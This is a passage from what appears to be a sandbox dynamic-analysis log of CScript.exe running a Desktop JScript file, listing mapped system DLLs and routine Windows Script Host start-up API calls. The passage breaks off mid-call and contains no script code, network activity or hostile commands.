"\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 363 start_va = 0x7ffc00110000 end_va = 0x7ffc0016cfff entry_point = 0x7ffc00110000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 364 start_va = 0x92e7cc0000 end_va = 0x92e7cc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e7cc0000" filename = "" Region: id = 365 start_va = 0x7ffbfff10000 end_va = 0x7ffbfffb7fff entry_point = 0x7ffbfff10000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 366 start_va = 0x92e7cd0000 end_va = 0x92e7cd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e7cd0000" filename = "" Region: id = 367 start_va = 0x92e7cd0000 end_va = 0x92e7cdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e7cd0000" filename = "" Region: id = 368 start_va = 0x7ffbf9f50000 end_va = 0x7ffbf9f59fff entry_point = 0x7ffbf9f50000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 369 start_va = 0x7ffbfced0000 end_va = 0x7ffbfcf37fff entry_point = 0x7ffbfced0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 370 start_va = 0x92e7cf0000 end_va = 0x92e7cf1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e7cf0000" filename = "" Region: id = 371 start_va = 0x7ffbfb2d0000 end_va = 0x7ffbfb543fff entry_point = 0x7ffbfb2d0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 372 start_va = 0x92e7d00000 end_va = 0x92e7d02fff entry_point = 0x92e7d00000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 373 start_va = 0x92e7d20000 end_va = 0x92e7d21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e7d20000" filename = "" Region: id = 374 start_va = 0x7ffbffc40000 end_va = 0x7ffbffcb3fff entry_point = 0x7ffbffc40000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 375 start_va = 0x92e7d30000 end_va = 0x92e7d30fff entry_point = 0x0 region_type = private name = "private_0x00000092e7d30000" filename = "" Region: id = 376 start_va = 0x7ffbeda10000 end_va = 0x7ffbeda23fff entry_point = 0x7ffbeda10000 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 377 start_va = 0x7ffc00370000 end_va = 0x7ffc003a5fff entry_point = 0x7ffc00370000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 378 start_va = 0x7ffc003b0000 end_va = 0x7ffc003d5fff entry_point = 0x7ffc003b0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 379 start_va = 0x7ffbffcc0000 end_va = 0x7ffbffcc9fff entry_point = 0x7ffbffcc0000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 380 start_va = 0x92e7d70000 end_va = 0x92e7e6ffff entry_point = 0x0 region_type = private name = "private_0x00000092e7d70000" filename = "" Region: id = 381 start_va = 0x92e7ef0000 end_va = 0x92e7efffff entry_point = 0x0 region_type = private name = "private_0x00000092e7ef0000" filename = "" Region: id = 382 start_va = 0x7ffbff7c0000 end_va = 0x7ffbff7e2fff entry_point = 0x7ffbff7c0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 383 start_va = 0x92e7d30000 end_va = 0x92e7d39fff entry_point = 0x92e7d30000 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 384 start_va = 0x7ffbeb4d0000 end_va = 0x7ffbeb4fefff entry_point = 0x7ffbeb4d0000 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 385 start_va = 0x7ffc03ae0000 end_va = 0x7ffc03b3afff entry_point = 0x7ffc03ae0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 386 start_va = 0x92e8360000 end_va = 0x92e845ffff entry_point = 0x0 region_type = private name = "private_0x00000092e8360000" filename = "" Region: id = 387 start_va = 0x92e8460000 end_va = 0x92e855ffff entry_point = 0x0 region_type = private name = "private_0x00000092e8460000" filename = "" Region: id = 388 start_va = 0x7ff7ebc58000 end_va = 0x7ff7ebc59fff entry_point = 0x0 region_type = private name = "private_0x00007ff7ebc58000" filename = "" Region: id = 389 start_va = 0x7ff7ebc5a000 end_va = 0x7ff7ebc5bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7ebc5a000" filename = "" Region: id = 390 start_va = 0x7ffbfcfc0000 end_va = 0x7ffbfcfd5fff entry_point = 0x7ffbfcfc0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 391 start_va = 0x7ffbfcfa0000 end_va = 0x7ffbfcfb9fff entry_point = 0x7ffbfcfa0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 392 start_va = 0x7ffbf25b0000 end_va = 0x7ffbf262ffff entry_point = 0x7ffbf25b0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 393 start_va = 0x92e7d40000 end_va = 0x92e7d44fff entry_point = 0x92e7d40000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 394 start_va = 0x92e7d50000 end_va = 0x92e7d5ffff entry_point = 0x92e7d50000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 395 start_va = 0x92e8560000 end_va = 0x92e865ffff entry_point = 0x0 region_type = private name = "private_0x00000092e8560000" filename = "" Region: id = 396 start_va = 0x92e8660000 end_va = 0x92e875ffff entry_point = 0x0 region_type = private name = "private_0x00000092e8660000" filename = "" Region: id = 397 start_va = 0x7ff7ebc54000 end_va = 0x7ff7ebc55fff entry_point = 0x0 region_type = private name = "private_0x00007ff7ebc54000" filename = "" Region: id = 398 start_va = 0x7ff7ebc56000 end_va = 0x7ff7ebc57fff entry_point = 0x0 region_type = private name = "private_0x00007ff7ebc56000" filename = "" Region: id = 399 start_va = 0x7ffbfba10000 end_va = 0x7ffbfba36fff entry_point = 0x7ffbfba10000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 400 start_va = 0x92e8760000 end_va = 0x92e895ffff entry_point = 0x0 region_type = private name = "private_0x00000092e8760000" filename = "" Region: id = 401 start_va = 0x7ffbedac0000 end_va = 0x7ffbedadefff entry_point = 0x7ffbedac0000 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 402 start_va = 0x92e8360000 end_va = 0x92e845ffff entry_point = 0x0 region_type = private name = "private_0x00000092e8360000" filename = "" Region: id = 403 start_va = 0x92e8960000 end_va = 0x92e8b5ffff entry_point = 0x0 region_type = private name = "private_0x00000092e8960000" filename = "" Region: id = 404 start_va = 0x92e8b60000 end_va = 0x92e8f5ffff entry_point = 0x0 region_type = private name = "private_0x00000092e8b60000" filename = "" Region: id = 405 start_va = 0x92e8f60000 end_va = 0x92e9344fff entry_point = 0x0 region_type = private name = "private_0x00000092e8f60000" filename = "" Region: id = 406 start_va = 0x92e9350000 end_va = 0x92e974ffff entry_point = 0x0 region_type = private name = "private_0x00000092e9350000" filename = "" Region: id = 407 start_va = 0x7ffbff0d0000 end_va = 0x7ffbff147fff entry_point = 0x7ffbff0d0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 425 start_va = 0x7ff7eb8c0000 end_va = 0x7ff7ebc4ffff entry_point = 0x7ff7eb8c0000 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 1 os_tid = 0xe70 [0047.237] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff7ecad0000 [0047.237] GetVersionExA (in: lpVersionInformation=0x92e559f830*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x92e559f830*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0047.237] GetUserDefaultLCID () returned 0x409 [0047.237] GetLocaleInfoW (in: Locale=0x409, LCType=0x20000070, lpLCData=0x92e559f3a0, cchData=2 | out: lpLCData="") returned 2 [0047.237] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x7ffc03dc0000 [0047.238] GetProcAddress (hModule=0x7ffc03dc0000, lpProcName="SetThreadUILanguage") returned 0x7ffc03ddd550 [0047.238] SetThreadUILanguage (LangId=0x0) returned 0x409 [0047.246] FreeLibrary (hLibModule=0x7ffc03dc0000) returned 1 [0047.246] GetCommandLineW () returned="\"C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\PAQUET~1.JS\" " [0047.246] wcscpy_s (in: _Destination=0x92e559f880, _SizeInWords=0x4c, _Source="\"C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\PAQUET~1.JS\" " | out: _Destination="\"C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\PAQUET~1.JS\" ") returned 0x0 [0047.246] wcscpy_s (in: _Destination=0x92e559f880, _SizeInWords=0x4c, _Source="C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\PAQUET~1.JS\" " | out: _Destination="C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\PAQUET~1.JS\" ") returned 0x0 [0047.246] wcscpy_s (in: _Destination=0x92e559f8be, _SizeInWords=0x2c, _Source=" \"C:\\Users\\CIIHMN~1\\Desktop\\PAQUET~1.JS\" " | out: _Destination=" \"C:\\Users\\CIIHMN~1\\Desktop\\PAQUET~1.JS\" ") returned 0x0 [0047.246] wcscpy_s (in: _Destination=0x92e559f8c2, _SizeInWords=0x29, _Source="C:\\Users\\CIIHMN~1\\Desktop\\PAQUET~1.JS\" " | out: _Destination="C:\\Users\\CIIHMN~1\\Desktop\\PAQUET~1.JS\" ") returned 0x0 [0047.246] wcscpy_s (in: _Destination=0x92e559f90c, _SizeInWords=0x3, _Source=" " | out: _Destination=" ") returned 0x0 [0047.246] GetCurrentThreadId () returned 0xe70 [0047.246] CoInitialize (pvReserved=0x0) returned 0x0 [0047.984] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x92e559f4f8 | out: phkResult=0x92e559f4f8*=0x0) returned 0x2 [0047.984] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x92e559f4f0 | out: phkResult=0x92e559f4f0*=0xec) returned 0x0 [0047.984] RegQueryValueExW (in: hKey=0xec, lpValueName="Enabled", lpReserved=0x0, lpType=0x92e559e7e4, lpData=0x92e559ebf0, lpcbData=0x92e559e7e0*=0x400 | out: lpType=0x92e559e7e4*=0x0, lpData=0x92e559ebf0*=0x0, lpcbData=0x92e559e7e0*=0x400) returned 0x2 [0047.984] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0047.997] RegCloseKey (hKey=0xec) returned 0x0 [0047.997] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x92e559f210 | out: phkResult=0x92e559f210*=0x0) returned 0x2 [0047.997] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x92e559f208 | out: phkResult=0x92e559f208*=0xec) returned 0x0 [0047.997] RegQueryValueExW (in: hKey=0xec, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x92e559e504, lpData=0x92e559e910, lpcbData=0x92e559e500*=0x400 | out: lpType=0x92e559e504*=0x0, lpData=0x92e559e910*=0x0, lpcbData=0x92e559e500*=0x400) returned 0x2 [0047.997] RegCloseKey (hKey=0xec) returned 0x0 [0047.997] GetACP () returned 0x4e4 [0047.997] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x7ffc03dc0000 [0047.997] GetProcAddress (hModule=0x7ffc03dc0000, lpProcName="HeapSetInformation") returned 0x7ffc03de0f40 [0047.997] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0047.997] FreeLibrary (hLibModule=0x7ffc03dc0000) returned 1 [0047.998] CoRegisterMessageFilter (in: lpMessageFilter=0x92e59359d0, lplpMessageFilter=0x92e59359e0 | out: lplpMessageFilter=0x92e59359e0*=0x0) returned 0x0 [0047.998] IUnknown:AddRef (This=0x92e59359d0) returned 0x2 [0047.998] GetModuleFileNameW (in: hModule=0x7ff7ecad0000, lpFilename=0x92e559f570, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\CScript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f [0047.998] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\CScript.exe", lpdwHandle=0x92e559ee90 | out: lpdwHandle=0x92e559ee90) returned 0x714 [0047.998] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\CScript.exe", dwHandle=0x0, dwLen=0x714, lpData=0x92e559e770 | out: lpData=0x92e559e770) returned 1 [0047.998] VerQueryValueW (in: pBlock=0x92e559e770, lpSubBlock="\\", lplpBuffer=0x92e559ee98, puLen=0x92e559ee94 | out: lplpBuffer=0x92e559ee98*=0x92e559e798, puLen=0x92e559ee94) returned 1 [0047.998] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x92e559eee8 | out: phkResult=0x92e559eee8*=0xec) returned 0x0 [0047.998] RegQueryValueExW (in: hKey=0xec, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x92e559e224, lpData=0x92e559e630, lpcbData=0x92e559e220*=0x400 | out: lpType=0x92e559e224*=0x0, lpData=0x92e559e630*=0x0, lpcbData=0x92e559e220*=0x400) returned 0x2 [0047.998] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x92e559eea0 | out: phkResult=0x92e559eea0*=0x0) returned 0x2 [0047.998] RegQueryValueExW (in: hKey=0xec, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x92e559ee54, lpData=0x92e559eee0, lpcbData=0x92e559ee50*=0x4 | out: lpType=0x92e559ee54*=0x0, lpData=0x92e559eee0*=0x1, lpcbData=0x92e559ee50*=0x4) returned 0x2 [0047.998] RegQueryValueExW (in: hKey=0xec, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x92e559e224, lpData=0x92e559e630, lpcbData=0x92e559e220*=0x400 | out: lpType=0x92e559e224*=0x1, lpData="1", lpcbData=0x92e559e220*=0x4) returned 0x0 [0047.999] RegCloseKey (hKey=0xec) returned 0x0 [0047.999] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x9200020019, lpSecurityAttributes=0x0, phkResult=0x92e559eee8, lpdwDisposition=0x0 | out: phkResult=0x92e559eee8*=0xec, lpdwDisposition=0x0) returned 0x0 [0047.999] RegQueryValueExW (in: hKey=0xec, lpValueName="Timeout", lpReserved=0x0, lpType=0x92e559ee74, lpData=0x92e559eee0, lpcbData=0x92e559ee70*=0x4 | out: lpType=0x92e559ee74*=0x0, lpData=0x92e559eee0*=0x1, lpcbData=0x92e559ee70*=0x4) returned 0x2 [0047.999] RegQueryValueExW (in: hKey=0xec, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x92e559e244, lpData=0x92e559e650, lpcbData=0x92e559e240*=0x400 | out: lpType=0x92e559e244*=0x1, lpData="1", lpcbData=0x92e559e240*=0x4) returned 0x0 [0047.999] RegCloseKey (hKey=0xec) returned 0x0 [0047.999] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x7ffc00020019, lpSecurityAttributes=0x0, phkResult=0x92e559eee8, lpdwDisposition=0x0 | out: phkResult=0x92e559eee8*=0x11c, lpdwDisposition=0x0) returned 0x0 [0047.999] RegQueryValueExW (in: hKey=0x11c, lpValueName="Timeout", lpReserved=0x0, lpType=0x92e559ee74, lpData=0x92e559eee0, lpcbData=0x92e559ee70*=0x4 | out: lpType=0x92e559ee74*=0x0, lpData=0x92e559eee0*=0x1, lpcbData=0x92e559ee70*=0x4) returned 0x2 [0047.999] RegQueryValueExW (in: hKey=0x11c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x92e559e244, lpData=0x92e559e650, lpcbData=0x92e559e240*=0x400 | out: lpType=0x92e559e244*=0x0, lpData=0x92e559e650*=0x31, lpcbData=0x92e559e240*=0x400) returned 0x2 [0047.999] RegCloseKey (hKey=0x11c) returned 0x0 [0047.999] wcscpy_s (in: _Destination=0x92e559f16c, _SizeInWords=0x104, _Source="C:\\Users\\CIIHMN~1\\Desktop\\PAQUET~1.JS" | out: _Destination="C:\\Users\\CIIHMN~1\\Desktop\\PAQUET~1.JS") returned 0x0 [0048.000] LoadStringW (in: hInstance=0x7ff7ecad0000, uID=0x834, lpBuffer=0x92e559dde0, cchBufferMax=2048 | out: lpBuffer="Microsoft (R) Windows Script Host Version %1!u!.%2!u!\nCopyright (C) Microsoft Corporation. All rights reserved.\n") returned 0x70 [0048.000] FormatMessageW (in: dwFlags=0x500, lpSource=0x92e56096a8, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x92e559edc8, nSize=0x0, Arguments=0x92e559ee38 | out: lpBuffer="ꇰ\x92") returned 0x6c [0048.000] LocalFree (hMem=0x92e560a1f0) returned 0x0 [0048.000] GetStdHandle (nStdHandle=0xfffffff5) returned 0x2c [0048.002] GetConsoleMode (in: hConsoleHandle=0x2c, lpMode=0x92e559eb80 | out: lpMode=0x92e559eb80) returned 1 [0048.002] WriteConsoleW (in: hConsoleOutput=0x2c, lpBuffer=0x92e5609bc0*, nNumberOfCharsToWrite=0x6e, lpNumberOfCharsWritten=0x92e559eb88, lpReserved=0x0 | out: lpBuffer=0x92e5609bc0*, lpNumberOfCharsWritten=0x92e559eb88*=0x6e) returned 1 [0048.003] LoadStringW (in: hInstance=0x7ff7ecad0000, uID=0x7d1, lpBuffer=0x92e559d900, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13 [0048.003] LoadTypeLib (in: szFile="C:\\Windows\\System32\\CScript.exe", pptlib=0x92e559e940*=0x0 | out: pptlib=0x92e559e940*=0x92e560a400) returned 0x0 [0048.009] ITypeLib:GetTypeInfoOfGuid (in: This=0x92e560a400, GUID=0x7ff7ecae6e90*(Data1=0x91afbd1b, Data2=0x5feb, Data3=0x43f5, Data4=([0]=0xb0, [1]=0x28, [2]=0xe2, [3]=0xca, [4]=0x96, [5]=0x6, [6]=0x17, [7]=0xec)), ppTInfo=0x92e559e928 | out: ppTInfo=0x92e559e928*=0x92e560ac88) returned 0x0 [0048.212] ITypeLib:GetTypeInfoOfGuid (in: This=0x92e560a400, GUID=0x7ff7ecae6a90*(Data1=0x2cc5a9d0, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x92e559e8f8 | out: ppTInfo=0x92e559e8f8*=0x92e560ad38) returned 0x0 [0048.213] ITypeInfo:GetRefTypeOfImplType (in: This=0x92e560ad38, index=0xffffffff, pRefType=0x92e559e8f0 | out: pRefType=0x92e559e8f0*=0xfffffffe) returned 0x0 [0048.213] ITypeInfo:GetRefTypeInfo (in: This=0x92e560ad38, hreftype=0xfffffffe, ppTInfo=0x7ff7ecaf20c8 | out: ppTInfo=0x7ff7ecaf20c8*=0x92e560ad90) returned 0x0 [0048.213] IUnknown:Release (This=0x92e560ad38) returned 0x1 [0048.213] ITypeLib:GetTypeInfoOfGuid (in: This=0x92e560a400, GUID=0x7ff7ecae77a0*(Data1=0xbf64faf0, Data2=0x5906, Data3=0x426c, Data4=([0]=0xb4, [1]=0xbc, [2]=0x7b, [3]=0x75, [4]=0x3c, [5]=0xbe, [6]=0x81, [7]=0x9f)), ppTInfo=0x92e559e8f8 | out: ppTInfo=0x92e559e8f8*=0x92e560ade8) returned 0x0 [0048.213] ITypeInfo:GetRefTypeOfImplType (in: This=0x92e560ade8, index=0xffffffff, pRefType=0x92e559e8f0 | out: pRefType=0x92e559e8f0*=0xfffffffe) returned 0x0 [0048.213] ITypeInfo:GetRefTypeInfo (in: This=0x92e560ade8, hreftype=0xfffffffe, ppTInfo=0x7ff7ecaf2088 | out: ppTInfo=0x7ff7ecaf2088*=0x92e560ae40) returned 0x0 [0048.213] IUnknown:Release (This=0x92e560ade8) returned 0x1 [0048.213] ITypeLib:GetTypeInfoOfGuid (in: This=0x92e560a400, GUID=0x7ff7ecae6ea0*(Data1=0x2cc5a9d1, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x92e559e8f8 | out: ppTInfo=0x92e559e8f8*=0x92e560ae98) returned 0x0 [0048.213] ITypeInfo:GetRefTypeOfImplType (in: This=0x92e560ae98, index=0xffffffff, pRefType=0x92e559e8f0 | out: pRefType=0x92e559e8f0*=0xfffffffe) returned 0x0 [0048.213] ITypeInfo:GetRefTypeInfo (in: This=0x92e560ae98, hreftype=0xfffffffe, ppTInfo=0x7ff7ecaf2048 | out: ppTInfo=0x7ff7ecaf2048*=0x92e560aef0) returned 0x0 [0048.213] IUnknown:Release (This=0x92e560ae98) returned 0x1 [0048.213] IUnknown:Release (This=0x92e560a400) returned 0x4 [0048.213] GetCurrentThreadId () returned 0xe70 [0048.213] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x128 [0048.213] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7ff7ecad1790, lpParameter=0x92e5935bf0, dwCreationFlags=0x0, lpThreadId=0x92e5935c18 | out: lpThreadId=0x92e5935c18*=0xec4) returned 0x12c [0048.214] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x92e559eb70*=0x128, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff) returned 0x0 [0048.224] CloseHandle (hObject=0x128) returned 1 [0048.224] GetFullPathNameW (in: lpFileName="C:\\Users\\CIIHMN~1\\Desktop\\PAQUET~1.JS", nBufferLength=0x104, lpBuffer=0x92e559ec60, lpFilePart=0x92e559ec58 | out: lpBuffer="C:\\Users\\CIIHMN~1\\Desktop\\PAQUET~1.JS", lpFilePart=0x92e559ec58*="PAQUET~1.JS") returned 0x25 [0048.224] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".JS", ulOptions=0x0, samDesired=0x20019, phkResult=0x92e559e160 | out: phkResult=0x92e559e160*=0x146) returned 0x0 [0048.224] RegQueryValueExW (in: hKey=0x146, lpValueName=0x0, lpReserved=0x0, lpType=0x92e559e124, lpData=0x92e559e170, lpcbData=0x92e559e120*=0x800 | out: lpType=0x92e559e124*=0x1, lpData="JSFile", lpcbData=0x92e559e120*=0xe) returned 0x0 [0048.224] RegCloseKey (hKey=0x146) returned 0x0 [0048.224] wcscat_s (in: _Destination="JSFile", _SizeInWords=0x40e, _Source="\\ScriptEngine" | out: _Destination="JSFile\\ScriptEngine") returned 0x0 [0048.224] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="JSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x92e559e160 | out: phkResult=0x92e559e160*=0x146) returned 0x0 [0048.224] RegQueryValueExW (in: hKey=0x146, lpValueName=0x0, lpReserved=0x0, lpType=0x92e559e124, lpData=0x92e559e9e0, lpcbData=0x92e559e120*=0x200 | out: lpType=0x92e559e124*=0x1, lpData="JScript", lpcbData=0x92e559e120*=0x10) returned 0x0 [0048.224] RegCloseKey (hKey=0x146) returned 0x0 [0048.224] CLSIDFromString (in: lpsz="JScript", pclsid=0x92e559e958 | out: pclsid=0x92e559e958*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58))) returned 0x0 [0048.225] CoCreateInstance (in: rclsid=0x92e559e958*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x7ff7ecae6e60*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x92e559e950 | out: ppv=0x92e559e950*=0x92e5936470) returned 0x0 [0048.876] __dllonexit () returned 0x7ffbed46be30 [0048.876] __dllonexit () returned 0x7ffbed46be40 [0048.876] __dllonexit () returned 0x7ffbed46be60 [0048.876] __dllonexit () returned 0x7ffbed46be80 [0048.876] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x92e559c150, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\CScript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f [0048.876] _splitpath_s (in: _FullPath="C:\\Windows\\System32\\CScript.exe", _Drive=0x0, _DriveSize=0x0, _Dir=0x0, _DirSize=0x0, _Filename=0x92e559c2d0, _FilenameSize=0x104, _Ext=0x0, _ExtSize=0x0 | out: _Drive=0x0, _Dir=0x0, _Filename="CScript", _Ext=0x0) returned 0x0 [0048.876] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x92e559c2b8 | out: phkResult=0x92e559c2b8*=0x0) returned 0x2 [0048.880] GetVersion () returned 0x2800000a [0048.880] GetModuleHandleW (lpModuleName="api-ms-win-core-processthreads-l1-1-2.dll") returned 0x7ffc03dc0000 [0048.880] GetProcAddress (hModule=0x7ffc03dc0000, lpProcName="QueryProtectedPolicy") returned 0x7ffc013cd460 [0048.880] VirtualProtect (in: lpAddress=0x7ffbed4c6668, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0x92e559c400 | out: lpflOldProtect=0x92e559c400*=0x2) returned 1 [0048.880] VirtualProtect (in: lpAddress=0x7ffbed4c6668, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x92e559c400 | 